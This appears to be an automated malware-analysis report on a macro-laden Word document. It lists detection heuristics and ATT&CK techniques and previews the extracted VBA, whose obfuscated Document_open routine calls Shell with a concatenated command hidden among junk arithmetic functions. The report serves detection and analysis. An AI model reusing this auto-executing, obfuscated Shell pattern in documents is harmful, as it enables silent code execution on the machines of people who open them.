MALICIOUS
162
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The sample is a Microsoft Office document containing VBA macros. The critical heuristic firing indicates a Shell() call within the Document_Open macro, which is a common technique for executing arbitrary commands. The macro's obfuscated nature and the presence of the Shell() call strongly suggest it's designed to download and execute a secondary payload.
Heuristics 5
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 65309 bytes |
SHA-256: 3215b001258a1a0fe6c2218233d9983b30fed247a9fab808169b38a3a0f46282 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "oizMYZcvn"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function antSFptqTR()
On Error Resume Next
zObqmj = 51459 + hawLtW - (EwjdOW + RjVEB)
uViiYh = 30095 + zqjkz - (ANYwm + SslUOT)
soEhqi = 99070 + nWrCuc - (tAClAh + nRqCiB)
PPwzo = 97954 + jtVpJ - (qSrZmv + KNPjvo)
UErjd = 20653 + CtPKXZ - (GjzqE + TLhpBu)
REzUJ = 73136 + uwWEPk - (wnkkn + KiLLQc)
End Function
Private Function YJUoLMTalSB()
On Error Resume Next
vdpIVL = 80807 + uvdPVi - (vUfYs + pBdzzq)
cMIXV = 39208 + HwhwG - (FLJVwH + ofiYqD)
isBhW = 84002 + XCmHQp - (XNcAFS + viwbwR)
HMILjP = 85892 + trZTf - (advRYq + RquZkT)
khRWzZ = 11511 + QkpUoG - (prEvIU + qwfZnK)
mwvQP = 95355 + jLKck - (BVubG + XzEEuj)
End Function
Private Function nDzsZCmKOwiHw()
On Error Resume Next
YjsZk = 40251 + LzsWQ - (kiPAzf + PIkPUH)
zcFch = 99595 + XOzim - (MTcqF + DGwCbk)
NQwEjl = 33795 + TSfrG - (fXPPk + KdkqO)
pJYlK = 12582 + ozsuI - (BijJz + GMMfz)
JcdYl = 81519 + VwXIZG - (ClMtW + XwMjUF)
End Function
Private Sub Document_open()
On Error Resume Next
zcEIF = 13634 + AOwoBj + Ufhpzq / zTFlSZ - 21657 + VdJXW - (16835 + FkfWcT + ftwOY * kdADj)
AjqrU = 57575 + uZqEu + vaQCJ / dKILI - 12132 + KNTSPL - (77400 + KWLaG + vzOYPv * wdonm)
wHTnl = 65922 + ThBqYp + iTUkQ / CwadwR - 8354 + YILli - (37045 + DCSaK + soPUp * uEFpva)
Shell "" + zXnhQwsT + NppazJbORqo + CVar("c") + EBzRrcGoHKWG + pLVQLOVAjYJjr + ausuu + ablhHbTij + OQYTX + IiIjMRzzpPN + RncdnQsTU + LzUiwLpjEA + jiDrGwZ + bnTHfjG + WvzfOm + WodqNMEtbA + VSNajFFsFuo + fibUiBGk + ODDEJMrZ + bbsizFa + NXkrI + DFjWok + cjHdkcb + iNWCcOGK + qfhiDLv + azHHiOTq + SSvROpzWK + jzIFacD + sLwtpjXNi + mUmdiFCqR + UWjqnNcokk + rViljTAb + tGVlDFbDZiM, 0
mwJwU = 88872 + zzUSnO + EdbhA / JMuXH - 46694 + hrFNu - (38651 + UIHzG + Ehiwj * YQIJOD)
sLbLjf = 60656 + rbtSBd + XMuWIw / ooMZj - 21662 + uivwjq - (50295 + HQvaz + ibSCb * fNnpko)
NaElo = 92306 + QFsHXS + uwWbb / PbivoS - 109 + ZhqJGS - (80239 + DVKKMo + lqLWMV * mnbrl)
End Sub
Private Function nKzLQLwDpVIjw()
On Error Resume Next
rPfNHf = (FSzsq / zpkfTM + 66598 / 46772) / (97983 / ShpSuM * (KrzRNz + 43782))
mtCbo = 10787 + radwm + jMtdb / OaDAQS - 5052 + TTzqYV - (90064 + krYolW + YhUYv * dbiIU)
itmJmY = 95411 + cnXQH + bCEmss / iSvtG - 19848 + sThETP - (7146 + EPCNYv + uwHocB * ZVbJX)
UbWwYr = (bhUji / VWJTz + 8091 / 47824) / (92499 / Yvuzru * (PnPZS + 44766))
QnpiK = (lQbjkv / LVCsdN + 61686 / 34641) / (23454 / spmAq * (jpNjC + 91871))
End Function
Private Function zWvErYBz()
On Error Resume Next
icCciv = 23925 + hawws + hXIXQ / qBNFU - 36770 + misCYX - (43753 + tIifr + tozMql * QrtvB)
VAsBQ = 32440 + bzwEcw + RNvDiP / DCuXnO - 14737 + EktuVq - (40149 + lWKHJ + uEVaIn * dzPBTS)
QKQBCi = 56403 + EupRz + GZKCHX / QkNmF - 22461 + rtJjC - (92353 + FNcJr + KERKKo * IqRaI)
zZDPz = 37111 + UKlFP + bBLit / jsMTC - 53494 + lKAbj - (51897 + XRfKM + Xjpuj * vkwGf)
dPwIL = 39165 + hoYXZW + oOdrZ / wMNtd - 65330 + VmzGX - (64137 + ddMWU + IMzbo * OQccP)
rzjnGA = 76479 + hzUiBi + jKVBVh / ACSmzj - 61221 + DVrCjW - (81042 + ZJYfqj + LiZCD * liOAzz)
End Function
Private Function DHBuvwqzvW()
On Error Resume Next
kiXGiK = 72828 + uwPpdE + EnrPu / bpEAHQ - 15459 + SjikwC - (74516 + qzmcil + JGABAt * HPdwI)
wrwBCT = 63918 + IXicw + rdCkX / IFGRi - 92387 + XUfdfM - (16247 + mRwwfw + LfcZv * GMzLzi)
TdWFh = 89137 + zbIcW + XiTXh / StlQf - 49385 + KivSb - (35617 + XDPbib + NDuqz * OqFsNk)
TiNqf = 29371 + kCJjJm + TSroFj / pqajj - 7287 + ZDFro - (58547 + VClCM + dBlJpG * XmBYiu)
Gatdu = 53461 + hFiCZ + wtcRLq / vtHPH - 78876 + YSHCtw - (14225 + WtwoJL + AVwbPb * nLkRi)
End Function
Private Function DvjGnMS()
On Error Resume Next
wGSrlK = (tsWEwC / vBhdCH + 47715 / 47184) / (78363 / sDdiz * (iGPHtc +
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.